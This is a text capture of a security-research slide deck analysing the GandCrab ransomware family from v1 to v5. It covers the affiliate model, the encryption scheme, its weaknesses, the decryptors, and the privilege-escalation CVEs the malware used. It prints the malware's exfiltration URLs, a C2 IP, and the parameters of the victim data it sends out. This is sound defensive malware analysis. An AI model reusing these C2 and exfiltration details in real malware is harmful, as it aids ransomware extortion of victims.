Upload
others
View
3
Download
0
Embed Size (px)
Citation preview
GANDCRAB MENTALITY
Jasper Manuel Joie Salvio
GandCrab Ransomware-as-a-Service
Images by @CryptoInsane
Ransomware-as-a-Service (RaaS) • Affiliate scheme 60-40 or 70-30 • Speed, reliability, customization • Includes FUD, support, update
• Panel and Admin websites in TOR network • Must not target members of Russian
Commonwealth (AM, AZ, BY, RU, KZ, etc.)
Execution Flow
Encrypt Files
Contact C2
Delete Shadow Copies
Generate Keys
Terminate Processes
Collect Victim Information
Elevate Privilege
Ransom Note
Ransom Note Payment Page
Ransom Note and Payment Page
Jan Jul Feb Mar Jun Sep Oct Apr May Aug Nov Dec
GandCrab v1
v1
• First to use only DASH ($200-$1200) • .GDCB extension / GDCB-DECRYPT.txt
• .bit TLD for C2
• Uses RSA-2048/AES-CBC C2 domains
• gandcrab.bit • bleepingcomputer.bit • nomoreransom.bit • esetnod32.bit • emsisoft.bit
Vectors • RIG Exploit Kit • GRANDSOFT Exploit Kit • SPAM
Internal Versions • 1.0 • 1.1 • 2.1 • 2.1r
nslookup .exe <domain> a.dnspod.com
• 2.2r • 2.3r • 2.3.1r
Encrypted File Structure
Encrypted File Content
AES Key Encrypted with RSA
GandCrab v1 Weaknesses • Hard-coded RC4 key for victim info
Parameter Description
action always 'call' ip victim IP address pc_user username
pc_group domain name the machine is under pc_lang locale (e.g. en-US)
pc-keyb 1=Russian, 0=non-Russian
os_major Operating System (e.g. Windows 7 Ultimate)
os_bit Operating System Architecture (e.g. x64, x86, ARM ). ransom_id Roughly based on machine's root volume serial number hdd Information of all drives [<drive_letter>:_<drive_type>_<free_space>] pub_key RSA Public Key
priv_key RSA Private Key
version internal version hard-coded in the binary
Gathered Victim Info
Raw Victim Info
POST to http://<resolved-IP>/curl.php?token=<aff_id>
http://92.53.66.11/curl.php?token=1019
GandCrab v1 Weaknesses
RC4 Key
Encrypt data with RC4
GandCrab v1 Weaknesses • CRYPT_VERIFYCONTEXT flag not set
CRYPT_VERIFYCONTEXT Flag not set
Function to generate RSA keys
Generated private key Stored locally
Jan Jul Feb Mar Jun Sep Oct Apr May Aug Nov Dec
GandCrab v1
Decryptor Released
• Feb.28 , Romanian Police released a decryption tool for v1
• 50,000 victims in a month • $300k - $600k estimated
payments • Mostly US and UK
Jan Jul Feb Mar Jun Sep Oct Apr May Aug Nov Dec
• Payment page was compromised
• GandCrab v2 will be released soon
• Fired the web developer
• “Fortified” their infrastructures
GandCrab v1
Decryptor Released
GandCrab breach announcement
Jan Jul Feb Mar Jun Sep Oct Apr May Aug Nov Dec
GandCrab v2
v2
C2 domains • gdcb.bit • emsisoft.bit • gandcrab.bit • politiaromana.bit • malwarehunterteam.bit
• .CRAB extension / CRAB-DECRYPT.txt
• Core payload is now a DLL • Added Info parameters:
• id • subid
• Fake host header: bitdefender.com
Internal Versions
• 1.0.0r • kto_zaskrinit_tot_pidor • 1.2.0 • 1.2.1
GandCrab v2 POST /loey?lfeighss=oa&eas=fai HTTP/1.1 Host: bitdefender.com Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 Content-Length: 5880 Cache-Control: no-cache EQp98lcg4tzXH5KsHq7sNWqdQ8tncHJCkQO62jrhXSiV7VRDI88eJ5G2658rSKgAyfPUtJlUyIk5AOI+jkGHhmGiDgiVUzJjZSJ1Xyko1hgjn5r9mohEAQrviJj7PPdgPrTO/yyJdgRxH/o09gsT+NZ3T9Ou8qFPRa+/pNA07skamoilCi/M/vzTbaDIOsOEzmMLaKRChA9VyLhBF6acBRUQRVRLTLiF+TPHPKrgLzVpasnQtEyzVWCa0ETM9CyQUsNsWL30q8eFanG5qw8WcgkTpMPfNyqF1Eo62dBj1lFVM4603G…
Host: bitdefender.com
CRC32 CRC32
Initial crc = 0x29a (666)
Pseudo-random RC4 Key
• Pseudo-random RC4 key to encrypt victim info
“fowge?eiplei=deoresc” “europol” C10A57D3europol
RC4 Key
POST victim info to http://<resolved-IP>/<pseudo-random string>
http://92.53.66.11/fowge?eiplei=deoresc
Fixed CRYPT Flag
Function to generate RSA keys
Jan Jul Feb Mar Jun Sep Oct Apr May Aug Nov Dec
GandCrab v2.1
• Fake host header: ahnlab.com C2 domains
• ransomware.bit • zonealarm.bit
Internal Versions • 2.3.1 • 2.3.2 • 3.0.0
v2.1
GandCrab 2.1 Ransom Note
Jan Jul Feb Mar Jun Sep Oct Apr May Aug Nov Dec
GandCrab v3 • Changes wallpaper
• Fake host header: yahoo.com
• Adds autorun to HKLM for admin users
C2 domains • carder.bit • ransomware.bit
Internal Versions • 3.0.0 • 3.0.1
v3
GandCrab Changes Wallpaper
Jan Jul Feb Mar Jun Sep Oct Apr May Aug Nov Dec
GandCrab v3 Bug Unintentional “Lock Screen” on Windows 7 OS upon reboot
v3
Jan Jul Feb Mar Jun Sep Oct Apr May Aug Nov Dec
GandCrab v4 • Switches to RSA-Salsa20 encryption algorithm
• Encrypts offline
• Encrypts Network Shares
• Sandbox evasions (removed later)
• Anti-disassembly
• Removed wallpaper change
• Major code structure makeover
v4
Internal Versions • v4.0 • v4.1 • v4.1.1 • v4.1.2 • v4.1.3
• v4.1.2(new variant) • v4.2 • v4.2.1 • v4.3 • v4.4
Victim data and key in ransom note
Encrypted File Structure
Encrypted File Content
Salsa20 Key Encrypted with RSA Public Key
Keys in the Ransom Note
32-byte Salsa20 Key
RSA-2058 Private Key
Also stored in: HKCU\Software\keys_data\data\private
Encrypted Keys
RSA KEY Public Private
Salsa20 Key
RSA-2058 Private Key
(Encrypted with Salsa20)
SALSA20
Private
32-byte Salsa20 Key (Encrypted with RSA)
RSA
Salsa20 Key
GandCrab v4 Timeline
July Aug
Jul 04
v4.1 • Sends victim data
to a long list of URLs
v4.1.2 (new variant) GandCrab switches to mutex check v4.2 • Update picked up from
new 4.1.2 • Adds sandbox evasion
tricks
Jul 20
Aug 02
v4.2.1 • Removes VM evasion
function • Adds a link to POC of a
Denial-of-Service attack on Ahnlab’s AV component
v4.3 • Adds anti-disassembly trick
Vaccine v1 Ahnlab releases a vaccine based on .lock filename
Jul 13
Vaccine v2 Ahnlab releases a second version of the vaccine
Jul 18
v4.1.3 • No major
changes
v4.4 • Works as a vaccine by creating
the ransomware mutex. Did not work on win7 at first
Aug 06
Jul 17
v4.1.2 • Uses Salsa20 to generate
the .lock filename
Jul 11
v4.1.1 • No major changes
v4.0 • Salsa20/20 algorithm • Offline encryption • Encrypts network shares • Checks <8hex-chars>.lock
Jul 02 Jul 19
Jan Jul Feb Mar Jun Sep Oct Apr May Aug Nov Dec
GandCrab v5
v5
• <5-10_random_char> extension
• Exploits used to elevate privilege • ALPC EOP Vulnerability (CVE-2018-8440) • Win32k EOP Vulnerability CVE-2018-8120
• HTML ransom note, and added support for other languages
• Wallpaper feature (in some variants)
Internal Versions • v5.0 • v5.0.1 • v5.0.2 • v5.0.3
• v5.0.4 • v5.0.5
GandCrab v5 Decryptor
• GandCrab released keys for Syrian victims • Bitdefender released free decryptor for versions v1, v4, v5 (5.0.1-5.0.4) • Decryptor does not work on v5.0.5, just after a day
Post of Syrian key release
Bitdefender releases free decryptor
Crypter partnership • GandCrab partners with NTCrypt for a crypter service • $100 (one-time stub) $350 (two stubs/week)
GandCrab announces “Crypt Competition”
NTCrypt wins the deal
Conclusion
• Have good marketing skills to keep the trust of their affiliates and to build new partnerships.
• Try to compensate the not so advance malware with quick releases of new variants.
• Are very quick to react to solutions against them.
• Are loud, crazy, and very confident on what they do.
The people behind Gandcrab…
C2 Visit Count
0
50000
100000
150000
200000
250000
300000
350000 ransomware.bitpolitiaromana.bitnomoreransom.bitmalwarehunter.bitgdcb.bitgandcrab.bitesetnod32.bitemsisoft.bitbleepingcomputer.bitcarder.bit
v1 v2 V2.1 v3
Online Infection Map
0
500000
1000000
1500000
VISIT COUNT (top 10)
Move to Asian Market
• GandCrab looking for partners in a Chinese underground forum • VenusLocker campaign targeting South Korea
Sample Distribution
0
2000
4000
6000
8000
10000
12000
Samples Received Per Month (2018)
v1 v2 v3 v4 v5
References
• https://securingtomorrow.mcafee.com/mcafee-labs/rapidly-evolving-ransomware-gandcrab-version-5-partners-with-crypter-service-for-obfuscation/
• https://research.checkpoint.com/gandcrab-ransomware-mindset/
• https://www.bleepingcomputer.com/news/security/gandcrab-devs-release-decryption-keys-for-syrian-victims/
• Special thanks to @MarceloRivero, @ValthekOn